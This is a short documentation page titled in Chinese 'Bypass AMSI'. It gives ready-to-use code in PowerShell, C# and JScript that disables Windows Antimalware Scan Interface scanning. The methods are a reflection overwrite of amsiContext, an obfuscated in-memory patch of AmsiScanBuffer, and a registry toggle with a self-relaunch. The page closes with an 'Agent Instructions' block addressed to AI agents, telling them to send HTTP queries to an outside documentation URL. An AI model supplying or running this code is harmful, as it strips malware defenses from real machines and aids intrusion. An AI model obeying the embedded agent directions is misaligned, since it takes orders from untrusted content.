# 绕过AMSI Powershell: ``` $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) ``` c#: ```csharp public class Amsi { public static void Bypass() { string x64 = "uFcA"; x64 = x64 + "B4DD"; string x86 = "uFcAB4"; x86 = x86 + "DCGAA="; if (is64Bit()) PatchA(Convert.FromBase64String(x64)); else PatchA(Convert.FromBase64String(x86)); } private static void PatchA(byte[] patch) { try { string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw=")); var lib = Win32.LoadLibraryA(ref liba);//Amsi.dll string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")); var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer uint oldProtect; Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect); Marshal.Copy(patch, 0, addr, patch.Length); } catch (Exception e) { Console.WriteLine(" [x] {0}", e.Message); Console.WriteLine(" [x] {0}", e.InnerException); } } private static bool is64Bit() { bool is64Bit = true; if (IntPtr.Size == 4) is64Bit = false; return is64Bit; } } class Win32 { public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); #region CreateAPI [DllImport("kernel32", SetLastError = true)] public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); public static CreateApi LoadApi(string name, string method) { return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)); } #endregion } ``` js: ```javascript var sh=new ActiveXObject('WScript.Shell'); var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"; try{ var AmsiEnable=sh.RegRead(key); if(AmsiEnable!=0) { throw new Error(1,''); } } catch(e) { sh.RegWrite(key,0,"REG_DWORD"); sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1); sh.RegWrite(key,1,"REG_DWORD"); WScript.Quit(1); } ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.qwqdanchun.com/main/amsi/bypass-amsi.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.